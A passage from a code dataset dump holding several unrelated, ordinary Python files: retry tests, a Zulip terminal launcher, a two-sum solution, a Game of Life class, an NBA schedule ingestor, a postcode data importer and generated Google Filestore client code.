counter += 1\n raise RetryableError('failed')\n\n with pytest.raises(RetryableError):\n always_fails()\n\n assert counter == 4\n\n\ndef test_multiple_exception_types():\n counter = 0\n\n @retry((RetryableError, AnotherRetryableError), tries=4, delay=0.1)\n def raise_multiple_exceptions(counter):\n counter += 1\n if counter == 1:\n raise RetryableError('a retryable error')\n elif counter == 2:\n raise AnotherRetryableError('another retryable error')\n else:\n return [counter, 'success']\n\n r_counter, r_result = raise_multiple_exceptions(counter)\n assert r_counter == 3\n r_result == 'success'\n\n\ndef test_unexpected_exception_does_not_retry():\n\n @retry(RetryableError, tries=4, delay=0.1)\n def raise_unexpected_error():\n raise UnexpectedError('unexpected error')\n\n with pytest.raises(UnexpectedError):\n raise_unexpected_error()\n\n\ndef test_using_a_logger():\n counter = 0\n\n sh = logging.StreamHandler()\n logger = 
logging.getLogger(__name__)\n logger.addHandler(sh)\n\n @retry(RetryableError, tries=4, delay=0.1, logger=logger)\n def fails_once(counter):\n counter += 1\n if counter < 2:\n raise RetryableError('failed')\n else:\n return 'success'\n\n fails_once(counter)\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270706658","text":"#!/usr/bin/env python3\nimport argparse\nimport sys\n\nfrom zulipterminal.core import ZulipController\n\n\ndef parse_args():\n description = '''\n Starts Zulip-Terminal.\n '''\n formatter_class = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(description=description,\n formatter_class=formatter_class)\n\n parser.add_argument('--config-file', '-c',\n action='store',\n help='config file downloaded from your zulip\\\n organization.(e.g. ~/zuliprc)')\n parser.add_argument('--theme', '-t',\n default='default',\n help='choose color theme. (e.g. blue, light)')\n\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n try:\n ZulipController(args.config_file, args.theme).main()\n except KeyboardInterrupt:\n print(\"\\nThanks for using the Zulip-Terminal interface.\\n\")\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"76998605","text":"'''\nDescription:\nGiven an array of integers, find two numbers such that they add up to a specific target number.\n The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.\n Please note that your returned answers (both index1 and index2) are not zero-based.\n You may assume that each input would have exactly one solution.\n\nInput: numbers={2, 7, 11, 15}, target=9\nOutput: index1=1, index2=2\n'''\n\n\nclass Solution:\n # @param {integer[]} nums\n # @param {integer} target\n # @return {integer[]}\n def twoSum(self, nums, target):\n #create dictionary with key as nums item and value as nums index\n #note: dict in python in implemented with hash table, it has access time O(1)\n #suppose all items in intList are unique\n\n myDict = {} # tracks all the processed numbers with its latest index\n\n #check each entry in intList if it has a matching pair with target\n for i in range(len(nums)):\n currNum = nums[i]\n targetNum = target - currNum # calculate the expected counterPart\n\n if targetNum in myDict: # if this counterPart is in myDict, means we have a valid pair, return this pair\n return [myDict[targetNum]+1, i+1]\n myDict[currNum] = i # updating the current number to myDict\n\n return None # if nothing returned within the above for loop, then there is no such pairs in nums, return None\n\nlist = [2,7,11,15]\nprint(Solution().twoSum(list, 9))\n","sub_path":"Python/001-TwoSum.py","file_name":"001-TwoSum.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590535315","text":"import sys\nsys.path.append(\"../\")\nsys.path.append(\"../framework\")\n\nimport unittest as ut\nimport time\n\nimport job_scheduler as js\nimport dummy_job_test as fj\nimport base_case as bc\n\n\nclass TestJobScheduler(bc.TABaseCase):\n\n def _get_configs(self, delta):\n configs = [{\"priority\": i % 2, 
\"duration\": i % 2 + delta}\n for i in range(0, self.size - 1)]\n # append a once job\n configs.append({\"priority\": 0, \"duration\": 0})\n return configs\n\n def setUp(self):\n super(TestJobScheduler, self).setUp()\n self.size = 10\n configs = self._get_configs(1)\n self.scheduler = js.JobScheduler(fj.DummyJobFactory(configs))\n self.scheduler.start()\n\n def test_all(self):\n self.do_test_all(1)\n\n def do_test_all(self, delta):\n (sleep_time, ready_jobs) = self.scheduler.get_ready_jobs()\n time.sleep(sleep_time + 0.1)\n once_job_scheduled = False\n for i in range(1, 60):\n (sleep_time, ready_jobs) = self.scheduler.get_ready_jobs()\n for job in ready_jobs:\n if job.get(\"duration\") == 0:\n once_job_scheduled = True\n self.assertGreaterEqual(len(ready_jobs), 1)\n self.assertGreaterEqual(self.scheduler.number_of_jobs(),\n self.size - 1)\n if len(ready_jobs) > 1:\n for j, job in enumerate(ready_jobs):\n if j != 0:\n self.assertGreaterEqual(\n ready_jobs[j - 1].get(\"priority\"),\n ready_jobs[j].get(\"priority\"))\n time.sleep(sleep_time + 0.1)\n if once_job_scheduled:\n size = self.size - 1\n else:\n size = self.size\n self.assertEquals(self.scheduler.number_of_jobs(), size)\n\n def tearDown(self):\n self.scheduler.tear_down()\n\n\nif __name__ == \"__main__\":\n ut.main()\n","sub_path":"SplunkApps/TA_framework/unit/test_frmk_job_scheduler.py","file_name":"test_frmk_job_scheduler.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351458252","text":"import pylab as pyl\nimport matplotlib.pyplot as plt\nimport matplotlib.widgets as wig\n#from matplotlib.widgets import Slider, Button, RadioButtons\n\n## Sin Wave Plot ##\n\nfig = plt.figure()\nax = plt.axes(xlim=(0, 1), ylim=(-10, 10))\nl, = ax.plot([], [], lw=2, color='red')\n\nfig.add_subplot(111)\nfig.subplots_adjust(left=0.25, bottom=0.25)\n\n#t = arange(0.0, 1.0, 0.001)\n## Amplitude of sin wave\na0 = 5\n## Phase of sin wave\nf0 = 3\n## Sin wave equation applied to entire range, t\n##s = a0*sin(2*pi*f0*t)\n## `l,` is a plot of t vs s, with adjusted line width and color\n## Save this plot as l, for later use\n##l, = plot(t,s, lw=2, color='red')\n#l, = plot([], [], lw=2, color='red')\n#\n### Slider Plot ##\n## Define dimensions of a new plot\n#axis([0, 1, -10, 10])\n\n\n# We need to somehow put these on a subplot of some sort\n# New axis color\naxcolor = 'lightgoldenrodyellow'\n# Define positions of sliders\naxfreq = plt.axes([0.25, 0.1, 0.65, 0.03], axisbg=axcolor)\naxamp = plt.axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)\n\n# Define Sliders, ranges, and initial values\nsfreq = wig.Slider(axfreq, 'Freq', 0.1, 30.0, valinit=f0)\nsamp = wig.Slider(axamp, 'Amp', 0.1, 10.0, valinit=a0)\n\n\ndef update(val):\n amp = samp.val\n freq = sfreq.val\n #l.set_ydata(amp*np.sin(2*np.pi*freq*t))\n # draw()\nsfreq.on_changed(update)\nsamp.on_changed(update)\n\nresetax = plt.axes([0.8, 0.025, 0.1, 0.04])\nbutton = wig.Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')\n\n\ndef reset(event):\n sfreq.reset()\n samp.reset()\nbutton.on_clicked(reset)\n\nrax = plt.axes([0.025, 0.5, 0.15, 0.15], axisbg=axcolor)\nradio = wig.RadioButtons(rax, ('red', 'blue', 'green'), active=0)\n\n\ndef colorfunc(label):\n l.set_color(label)\n plt.draw()\nradio.on_clicked(colorfunc)\n\ndef init():\n l.set_data([], [])\n return l,\n\nimport numpy as np\n\ndef animate(i):\n amp = samp.val\n freq = sfreq.val\n x = np.linspace(0, 2, 1000)\n y = amp * np.sin(2 * np.pi * (x - 
freq * i))\n #y = a0 * np.sin(2 * np.pi *( x - f0 * i))\n l.set_data(x, y)\n return l,\n\nfrom matplotlib import animation\n\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=200, interval=200,\n blit=True)\n\n\nplt.show()\n","sub_path":"python/Libraries/matplotlib/Inter-mation.py","file_name":"Inter-mation.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"20708503","text":"import spacy\nfrom spacy.tokens import Span\n\nnlp = spacy.load(\"es_core_news_sm\")\n\n\ndef get_wikipedia_url(span):\n # Get the Wikipedia URL if the span has one of the following labels\n if span.label_ in (\"PER\", \"ORG\", \"LOC\"):\n entity_text = span.text.replace(\" \", \"_\")\n return \"https://es.wikipedia.org/w/index.php?search=\" + entity_text\n\n\n# Add the Span extension, wikipedia_url, using the getter get_wikipedia_url\nSpan.set_extension(\"wikipedia_url\", getter=get_wikipedia_url)\n\ndoc = nlp(\n \"Antes de finalizar 1976, el interés de David Bowie en la \"\n \"floreciente escena musical alemana, le llevó a mudarse a \"\n \"Alemania para revitalizar su carrera.\"\n)\nfor ent in doc.ents:\n # Print the entity's text and Wikipedia URL\n print(ent.text, ent._.wikipedia_url)\n","sub_path":"exercises/es/solution_03_11.py","file_name":"solution_03_11.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"404858861","text":"from Files import Files\nfrom Cell import Cell\nimport random\n\n\nclass Environment:\n \"\"\"Algorithms for Game of Life\"\"\"\n def __init__(self, world_size, not_bordered, use_file):\n \"\"\"Sets up the critical variables and actions\"\"\"\n self.files = Files()\n self.spawn = 3 # The number of surrounding cells that alive cells spawn at\n self.goldilocks = [2, 3] # The lower and upper bounds for life to stay living\n self.not_bordered = not_bordered\n self.world_size = world_size\n self.end = False # Whether or not the world will end\n self.world = self.generate_world() # Create cell objects for each position within the world\n self.file_conversion(use_file) # Change the variables if the files are meant to be used\n\n def generate_world(self):\n \"\"\"Create cell objects for each position within the world\"\"\"\n return [[Cell() for y in range(self.world_size[1])] for x in range(self.world_size[0])]\n\n def change_specific(self, cell_pos):\n \"\"\"Switches a specific cell's value\"\"\"\n cell = self.world[cell_pos[0]][cell_pos[1]] # Selects the object stored in the selected position\n cell.update_history(True) # Changes selected cell to its opposite\n cell.wipe_history() # Ensures that the cell history remains clean even after multiple switches\n\n def spawn_random(self):\n \"\"\"Changes all cell values randomly\"\"\"\n for x in range(self.world_size[0]): # For each cell in the world\n for y in range(self.world_size[1]):\n if random.choice([True, False]):\n self.change_specific((x, y)) # Change cell value to its opposite based on random chance\n\n def next_generation(self):\n \"\"\"Calculates the next positions of life\"\"\"\n updates = [] # Updates to implement\n\n for x in range(self.world_size[0]): # For every coordinate in the cell range\n for y in range(self.world_size[1]):\n cell = self.world[x][y] # Set cell to the object stored in that coordinate\n surroundings = self.test_surroundings((x, y)) # Store the number of alive cells around 
the chosen cell\n # If the cell is under the conditions to spawn or die\n if (surroundings == self.spawn and not cell.is_alive()) or\\\n ((surroundings < self.goldilocks[0] or surroundings > self.goldilocks[1]) and cell.is_alive()):\n updates.append(cell) # Add cell to list recording changes to implement\n\n for x in range(self.world_size[0]): # For all coordinates in the cell range\n for y in range(self.world_size[1]):\n cell = self.world[x][y] # Set cell to the object stored in that coordinate\n # Updates cell history based on whether they are in the updates list\n if cell in updates:\n cell.update_history(True)\n else:\n cell.increment_history()\n\n self.files.update_world_history(self.world_size, self.world)\n # If the end count is equal to the total number of cells\n if not updates:\n self.end = True # The end becomes true\n\n def test_surroundings(self, cell_position):\n \"\"\"Returns the number of alive surrounding cells\"\"\"\n cell_count = 0 # The number of cells surrounding the origin cell\n for x_shift in range(3): # For every coordinate in the surroundings\n for y_shift in range(3):\n try: # Attempt the following unless it returns a IndexError\n scan_x = cell_position[0] + x_shift - 1 # The x_coordinate for the cell to scan\n scan_y = cell_position[1] + y_shift - 1 # The y_coordinate for the cell to scan\n\n if self.not_bordered: # If the game is not bordered\n scan_x = scan_x % self.world_size[0] # Loop the scanned positions\n scan_y = scan_y % self.world_size[1]\n\n if scan_x == -1 or scan_y == -1 or (x_shift - 1 == 0 and y_shift - 1 == 0):\n continue # Continue if the selected cell is off the screen or the original cell\n if self.world[scan_x][scan_y].is_alive(): # If the selected cell is alive\n cell_count += 1\n\n except IndexError:\n continue\n\n # Return the number of cells surrounding cell that are alive\n return cell_count\n\n def file_conversion(self, use_file):\n \"\"\"Converts the history output from the file class into the relevant self variables\"\"\"\n if use_file[0] and use_file[0] <= len(self.files.file_data):\n history = self.files.return_world_history(use_file[1])\n self.world_size = history[0] # Sets the world size according to file data\n self.world = self.generate_world()\n for x in range(self.world_size[0]): # For all coordinates in the cell range\n for y in range(self.world_size[1]):\n filed_cell = history[1][x][y] # Set filed_cell to the stored data at that point\n if filed_cell[0]:\n self.change_specific((x, y)) # If cell is recorded as alive, then make it so\n if filed_cell[1]:\n if not filed_cell[0]:\n self.change_specific((x, y)) # Change the specific cell\n self.world[x][y].update_history(True) # List cell as dead if it is recorded\n else:\n self.world[x][y].increment_history() # Add history if it is recorded\n","sub_path":"Algorithm.py","file_name":"Algorithm.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65725991","text":"import scipy.io as sio\nimport matplotlib.pyplot as plt\nimport pickle\nimport mne\nimport numpy as np\nimport argparse\nimport os\nimport sys\nimport statsmodels.stats.proportion as prop\nimport read_data_batch\n\n# Averages and visualizes and saves (as .pdf) the data from all subjects of certain condition.\n# input:\n#\t--path \n#\t--condition \n#\t--t (optional)\n#\n# Data are saved in the input path directory\n\n# ADD CONFIDENCE INTERVALS!\n\nfig_size = (16,9)\n\nparser = argparse.ArgumentParser(description='Enter path to 
files and timestamp (optional)')\nparser.add_argument('--path') # Required - path to folder with batch, containing subject specific folders\nparser.add_argument('--condition') # Required - condition to average over\nparser.add_argument('--t') # Optional to pick timestamp on figure 2\nparser.add_argument('--reconstructed') # Optional to pick reconstruction mode: attended/unattended\n\nargs = parser.parse_args();\n\nif args.reconstructed is None:\n\trec = ''\nelse:\n\trec = '_' + args.reconstructed\n\ndir_list = os.listdir(args.path)\nplot_list = list()\n\nfor i in dir_list:\n\tif i.find(args.condition) != -1 and i.find('pdf') == -1 and i.find(rec) != -1:\n\t\tplot_list.append(i)\n\nif len(plot_list) == 0:\n\tsys.exit('Condition not found!')\n\nperf_m, corr_a_m, corr_ua_m, B_coef_m, best_L_m, lambdas, nlag, nchannels, N, eeg_info = read_data_batch.read_data(plot_list, args)\n\nCI_L = np.ones([len(lambdas)])*prop.proportion_confint(N/2,N)[0]\nCI_U = np.ones([len(lambdas)])*prop.proportion_confint(N/2,N)[1]\n\nfig1 = plt.figure(1,figsize=fig_size)\nfig1.add_subplot(1,2,1)\nplt.plot(np.log10(lambdas),perf_m)\nplt.plot(np.log10(lambdas),CI_L, 'k--')\nplt.plot(np.log10(lambdas),CI_U, 'k--')\nplt.xlabel('$log_{10}(\\lambda_n)$')\nplt.ylabel('Average decoder performance')\nplt.legend(['attended','0.95 confidence interval'])\nfig1.add_subplot(1,2,2)\nplt.plot(np.log10(lambdas),corr_a_m)\nplt.plot(np.log10(lambdas),corr_ua_m)\nplt.legend(['attended','unattended'])\nplt.xlabel('$log_{10}(\\lambda_n)$')\nplt.ylabel('Average correlation coefficient')\nplt.title('$\\lambda_n$ vs avg(correlation)')\nplt.tight_layout()\n# fig1.show()\n\n# Timestamp marked in the picture\nif args.t is None:\n\tt = 0.01#[s]\nelse:\n\tt = args.t\n\nB_heat = B_coef_m.reshape(nlag,nchannels)\n\nfig2 = plt.figure(2,figsize=fig_size)\nfig2.add_subplot(1,2,1)\nplt.title('Average model coefficients with average regularization parameter $\\lambda_n$ = {}'.format(best_L_m), fontsize=10)\nplt.pcolor(B_heat.transpose(),cmap='RdBu_r')\nplt.axis([0, nlag, nchannels, 0])\nplt.colorbar()\nplt.ylabel('channel n.')\nplt.xticks(range(0,nlag), ['%.3f' % float(i/eeg_info['sfreq']) for i in range(0,nlag)], rotation='vertical', fontsize=7)\nplt.xlabel('timelag [s]')\nfig2.add_subplot(1,2,2)\nplt.title('Topographic plot at t = %.3f s'%t)\nmne.viz.plot_topomap(B_heat[int(t*eeg_info['sfreq'])][0:nchannels], eeg_info, show=False, cmap='RdBu_r')\nplt.tight_layout()\n# fig2.show()\n\ntimes = [round(0.001*x,6) for x in range(6,15)]\n\nfig3 = plt.figure(3,figsize=fig_size)\n\nfor i in range(0,len(times)):\n\tfig3.add_subplot(3,3,i+1)\n\tmne.viz.plot_topomap(B_heat[int(times[i]*eeg_info['sfreq'])][0:nchannels], eeg_info, show=False, cmap='RdBu_r')\n\tplt.title('T = ' + str(times[i]) + 'ms')\n\nplt.tight_layout()\n# fig3.show()\n\n# raw_input()\n\nfig1.savefig(args.path + args.condition + rec + '_avg_performance.pdf')\nfig2.savefig(args.path + args.condition + rec + '_avg_model_coeff.pdf')\nfig3.savefig(args.path + args.condition + rec + '_avg_timestamps.pdf')\n\nfig1.clf();\nfig2.clf();\nfig3.clf();","sub_path":"visualisation_scripts/visualize_real_avg.py","file_name":"visualize_real_avg.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9301916","text":"\"\"\"This class ingests all game and game dates for a given season.\"\"\"\nfrom datetime import date, datetime, timezone\n\nfrom fantalytix_python_crawler.crawler.sports_reference.basketball\\\n 
.season_schedule_page_parser import SeasonSchedulePageParser\n\nfrom fantalytix_sqlalchemy.orm.common.league import League\nfrom fantalytix_sqlalchemy.orm.common.season import Season\nfrom fantalytix_sqlalchemy.orm.common.team import Team\nfrom fantalytix_sqlalchemy.orm.nba.nba_game import NBAGame\n\nclass NBASeasonScheduleIngestor:\n\n EMPTY_STR = ''\n STATUS_COMPLETED = 'completed'\n STATUS_SCHEDULED = 'scheduled'\n STATUS_IN_PROGRESS = 'in_progress'\n\n def __init__(self):\n self.signature = self.__repr__()\n self.league_cache = dict()\n self.season_cache = dict()\n self.team_cache = dict()\n self.nba_game_cache = dict()\n\n def get_league_by_abbreviation(self, abbreviation, session):\n \"\"\"Gets the league object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n league = self.league_cache.get(abbreviation)\n if league is None or league not in session:\n league = session.query(League)\\\n .filter_by(abbreviation=abbreviation)\\\n .one()\n self.league_cache[abbreviation] = league\n return league\n\n def get_season(self, end_year, abbreviation, session):\n \"\"\"Gets the season object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n league = self.get_league_by_abbreviation(abbreviation, session)\n season = self.season_cache.get((end_year, league))\n if season is None or season not in session:\n season = session.query(Season).filter_by(\n end_year=end_year,\n league_id=league.id\n ).one()\n self.season_cache[(end_year, league)] = season\n return season\n\n def get_team_by_abbreviation(self, abbreviation, session):\n \"\"\"Gets the team object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n team = self.team_cache.get(abbreviation)\n if team is None or team not in session:\n team = session.query(Team)\\\n .filter_by(abbreviation=abbreviation)\\\n .one()\n self.team_cache[abbreviation] = team\n return team\n\n def get_team_by_name(self, name, session):\n \"\"\"Gets the team object from the cache if available. 
If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n name = name.lower()\n team = self.team_cache.get(name)\n if team is None or team not in session:\n team = session.query(Team)\\\n .filter_by(name=name)\\\n .one()\n self.team_cache[name] = team\n return team\n\n def get_status(self, game_date):\n if game_date > datetime.now():\n return self.STATUS_SCHEDULED\n return self.STATUS_COMPLETED\n\n def overtime_to_int(self, text):\n if text is None or text == self.EMPTY_STR:\n return 0\n return 1\n\n def map_to_nba_game(self, row, session, season):\n home_team = self.get_team_by_name(row['home_team_name'], session)\n away_team = self.get_team_by_name(row['visitor_team_name'], session)\n game_date = datetime.combine(row['game_date'], row['game_start_time'])\n if row['home_pts'] > row['visitor_pts']:\n winning_team = home_team\n else:\n winning_team = away_team\n return NBAGame(\n season_id=season.id,\n home_team_id=home_team.id,\n away_team_id=away_team.id,\n game_date=game_date,\n home_score=row['home_pts'],\n away_score=row['visitor_pts'],\n overtimes=self.overtime_to_int(row['overtimes']),\n winning_team_id=winning_team.id,\n status=self.get_status(game_date),\n type=row['type']\n )\n\n def update_nba_game(self, row, session, nba_game):\n \"\"\"Updates the nba_game object if its information is different from the \n nba_game row.\n \"\"\"\n updated = False\n if nba_game.home_score != row['home_pts']:\n nba_game.home_score = row['home_pts']\n updated = True\n if nba_game.away_score != row['visitor_pts']:\n nba_game.away_score = row['visitor_pts']\n updated = True\n if nba_game.overtimes != self.overtime_to_int(row['overtimes']):\n nba_game.overtimes = self.overtime_to_int(row['overtimes'])\n updated = True\n if row['home_pts'] > row['visitor_pts']:\n winning_team = nba_game.home_team\n else:\n winning_team = nba_game.away_team\n if updated:\n nba_game.winning_team_id = winning_team.id\n nba_game.last_updated_by = self.signature\n nba_game.last_updated_date = datetime.now(tz=timezone.utc)\n return nba_game\n\n def get_nba_game_query(self, row, session, season):\n game_date = datetime.combine(row['game_date'], row['game_start_time'])\n home_team = self.get_team_by_name(row['home_team_name'], session)\n away_team = self.get_team_by_name(row['visitor_team_name'], session)\n return session.query(NBAGame).filter_by(\n season_id=season.id,\n home_team_id=home_team.id,\n away_team_id=away_team.id,\n game_date=game_date)\n\n def get_nba_game_or_none(self, row, session, season):\n return self.get_nba_game_query(row, session, season).one_or_none()\n\n def ingest_all(self, html, session, season_end_year, \n league_abbreviation='NBA'):\n \"\"\"This method iterates through each scheduled game row starting from \n the top of the page, adds new games and updates existing games.\n \"\"\"\n parser = SeasonSchedulePageParser(html)\n for row in parser.get_data():\n season = self.get_season(\n season_end_year, \n league_abbreviation, \n session)\n nba_game = self.get_nba_game_or_none(row, session, season)\n if nba_game is None:\n session.add(self.map_to_nba_game(row, session, season))\n else:\n self.update_nba_game(row, session, nba_game)\n\n def __repr__(self):\n return 
\"\"\n","sub_path":"src/fantalytix_python_ingestion/ingestion/sports_reference/basketball/nba_season_schedule_ingestor.py","file_name":"nba_season_schedule_ingestor.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523233688","text":"import os\nimport psutil\nimport shutil\nimport tempfile\nimport urllib.request\nfrom django.core.management.base import BaseCommand\nfrom storage.zipfile import unzip\nfrom uk_geo_utils.management.commands.import_onspd import Command as LocalImporter\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"url\", action=\"store\")\n\n def check_memory(self):\n # Downloading, unzipping and working with the ONSPD\n # requires a decent chunk of memory to play with.\n # Running this import on a really small instance\n # like a t2.micro will cause an Out Of Memory error\n\n # Ensure we've got >2Gb total before we start\n mem = psutil.virtual_memory()\n gb = ((mem.total / 1024) / 1024) / 1024\n return gb >= 2\n\n def handle(self, **options):\n if not self.check_memory():\n raise Exception(\n \"This instance has less than the recommended memory. Try running the import from a larger instance.\"\n )\n\n url = options[\"url\"]\n self.stdout.write(\"Downloading data from %s ...\" % (url))\n tmp = tempfile.NamedTemporaryFile()\n urllib.request.urlretrieve(url, tmp.name)\n tempdir = unzip(tmp.name)\n data_path = os.path.join(tempdir, \"Data\")\n try:\n cmd = LocalImporter()\n cmd.handle(**{\"path\": data_path, \"transaction\": False})\n finally:\n self.cleanup(tempdir)\n\n def cleanup(self, tempdir):\n # clean up the temp files we created\n try:\n shutil.rmtree(tempdir)\n except OSError:\n self.stdout.write(\"Failed to clean up temp files.\")\n","sub_path":"every_election/apps/core/management/commands/import_onspd_remote.py","file_name":"import_onspd_remote.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12445260","text":"# Copyright 2023 Google LLC. 
All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom connector import channel\nfrom google3.cloud.graphite.mmv2.services.google.filestore import instance_pb2\nfrom google3.cloud.graphite.mmv2.services.google.filestore import instance_pb2_grpc\n\nfrom typing import List\n\n\nclass Instance(object):\n def __init__(\n self,\n name: str = None,\n description: str = None,\n state: str = None,\n status_message: str = None,\n create_time: str = None,\n tier: str = None,\n labels: dict = None,\n file_shares: list = None,\n networks: list = None,\n etag: str = None,\n project: str = None,\n location: str = None,\n service_account_file: str = \"\",\n ):\n channel.initialize()\n self.name = name\n self.description = description\n self.tier = tier\n self.labels = labels\n self.file_shares = file_shares\n self.networks = networks\n self.project = project\n self.location = location\n self.service_account_file = service_account_file\n\n def apply(self):\n stub = instance_pb2_grpc.FilestoreBetaInstanceServiceStub(channel.Channel())\n request = instance_pb2.ApplyFilestoreBetaInstanceRequest()\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceTierEnum.to_proto(self.tier):\n request.resource.tier = InstanceTierEnum.to_proto(self.tier)\n\n if Primitive.to_proto(self.labels):\n request.resource.labels = Primitive.to_proto(self.labels)\n\n if InstanceFileSharesArray.to_proto(self.file_shares):\n request.resource.file_shares.extend(\n InstanceFileSharesArray.to_proto(self.file_shares)\n )\n if InstanceNetworksArray.to_proto(self.networks):\n request.resource.networks.extend(\n InstanceNetworksArray.to_proto(self.networks)\n )\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n request.service_account_file = self.service_account_file\n\n response = stub.ApplyFilestoreBetaInstance(request)\n self.name = Primitive.from_proto(response.name)\n self.description = Primitive.from_proto(response.description)\n self.state = InstanceStateEnum.from_proto(response.state)\n self.status_message = Primitive.from_proto(response.status_message)\n self.create_time = Primitive.from_proto(response.create_time)\n self.tier = InstanceTierEnum.from_proto(response.tier)\n self.labels = Primitive.from_proto(response.labels)\n self.file_shares = InstanceFileSharesArray.from_proto(response.file_shares)\n self.networks = InstanceNetworksArray.from_proto(response.networks)\n self.etag = Primitive.from_proto(response.etag)\n self.project = Primitive.from_proto(response.project)\n self.location = Primitive.from_proto(response.location)\n\n def delete(self):\n stub = instance_pb2_grpc.FilestoreBetaInstanceServiceStub(channel.Channel())\n request = 
instance_pb2.DeleteFilestoreBetaInstanceRequest()\n request.service_account_file = self.service_account_file\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceTierEnum.to_proto(self.tier):\n request.resource.tier = InstanceTierEnum.to_proto(self.tier)\n\n if Primitive.to_proto(self.labels):\n request.resource.labels = Primitive.to_proto(self.labels)\n\n if InstanceFileSharesArray.to_proto(self.file_shares):\n request.resource.file_shares.extend(\n InstanceFileSharesArray.to_proto(self.file_shares)\n )\n if InstanceNetworksArray.to_proto(self.networks):\n request.resource.networks.extend(\n InstanceNetworksArray.to_proto(self.networks)\n )\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n response = stub.DeleteFilestoreBetaInstance(request)\n\n @classmethod\n def list(self, project, location, service_account_file=\"\"):\n stub = instance_pb2_grpc.FilestoreBetaInstanceServiceStub(channel.Channel())\n request = instance_pb2.ListFilestoreBetaInstanceRequest()\n request.service_account_file = service_account_file\n request.Project = project\n\n request.Location = location\n\n return stub.ListFilestoreBetaInstance(request).items\n\n def to_proto(self):\n resource = instance_pb2.FilestoreBetaInstance()\n if Primitive.to_proto(self.name):\n resource.name = Primitive.to_proto(self.name)\n if Primitive.to_proto(self.description):\n resource.description = Primitive.to_proto(self.description)\n if InstanceTierEnum.to_proto(self.tier):\n resource.tier = InstanceTierEnum.to_proto(self.tier)\n if Primitive.to_proto(self.labels):\n resource.labels = Primitive.to_proto(self.labels)\n if InstanceFileSharesArray.to_proto(self.file_shares):\n resource.file_shares.extend(\n InstanceFileSharesArray.to_proto(self.file_shares)\n )\n if InstanceNetworksArray.to_proto(self.networks):\n resource.networks.extend(InstanceNetworksArray.to_proto(self.networks))\n if Primitive.to_proto(self.project):\n resource.project = Primitive.to_proto(self.project)\n if Primitive.to_proto(self.location):\n resource.location = Primitive.to_proto(self.location)\n return resource\n\n\nclass InstanceFileShares(object):\n def __init__(\n self,\n name: str = None,\n capacity_gb: int = None,\n source_backup: str = None,\n nfs_export_options: list = None,\n ):\n self.name = name\n self.capacity_gb = capacity_gb\n self.source_backup = source_backup\n self.nfs_export_options = nfs_export_options\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_pb2.FilestoreBetaInstanceFileShares()\n if Primitive.to_proto(resource.name):\n res.name = Primitive.to_proto(resource.name)\n if Primitive.to_proto(resource.capacity_gb):\n res.capacity_gb = Primitive.to_proto(resource.capacity_gb)\n if Primitive.to_proto(resource.source_backup):\n res.source_backup = Primitive.to_proto(resource.source_backup)\n if InstanceFileSharesNfsExportOptionsArray.to_proto(\n resource.nfs_export_options\n ):\n res.nfs_export_options.extend(\n InstanceFileSharesNfsExportOptionsArray.to_proto(\n resource.nfs_export_options\n )\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceFileShares(\n 